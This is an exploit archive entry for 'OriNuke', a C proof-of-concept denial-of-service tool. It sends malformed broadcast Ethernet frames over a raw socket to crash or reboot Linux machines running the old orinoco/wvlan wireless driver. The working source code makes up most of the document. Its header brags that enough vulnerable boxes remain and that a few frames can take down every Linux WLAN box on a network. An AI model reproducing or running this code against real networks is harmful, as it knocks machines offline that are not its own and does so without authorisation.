OriNuke - Orinoco Wavelan Nuker. Orinoco/wvlan driver (< orinoco_cs 0.11) did not check for under or oversized ethernet frames. This proof of concept tool crashes a remote system. Currently fixed in current release of the driver.
3009dac0da906612b271bdcd8e9cd9e56e5c69621dc76aaf15ea8661afcae452
/*******************************************************
*
* OriNuke - Orinoco Wavelan Nuker
* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*
* The old orinoco/wvlan driver ( < orinoco_cs 0.11)
* didn't check for under- oder oversized ethernet
* frames -> after receiving such a frame, the whole
* box crashed/rebooted...
*
* Since the bug finally has been fixed, here is a
* simple proof of concept exploit... there should
* still be enough vulnerable boxes out there...
*
* By sending a few of these broken ethernet frames
* you can wipe out all linux wlan boxes on the net.
*
* Keep in mind, that you need a wired box to send
* the nukes unless your wireless box can really spoof
* on ethernet level.
*
* Greetings fly to:
* DigiDust, Anarchy, Hunz, bullet, huega, Mike,
* Macrotron, koerk ...
*
*
* Have phun,
* gh0st
*
******************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <net/ethernet.h>
int main(int argc, char **argv) {
int sock, ret, i, numnukes;
char *packet, device[1024];
struct sockaddr sa;
packet=malloc(64);
memset(packet,0,64);
memset(packet,0xff,6);
printf("[[ OriNuke - WaveLAN Nuker ]]\n - written by gh0st\n\n");
if(argc<3) {
printf(" Usage: %s <interface> <numnukes>\n\n", argv[0]);
return -1;
}
strncpy(device,argv[1],1024);
numnukes=atoi(argv[2]);
if((sock=socket(PF_INET, SOCK_PACKET, htons(ETH_P_ALL)))<0){
perror("Error creating socket");
return -1;
}
memset(&sa,0,sizeof(sa));
strncpy(sa.sa_data,device,sizeof(sa.sa_data));
printf("Sending nukes: ");
for(i=0;i<numnukes;i++) {
ret=sendto(sock,packet,64,0,&sa,sizeof(sa));
printf(".");
}
printf("\n\nPeace!\n");
free(packet);
close(sock);
return 0;
}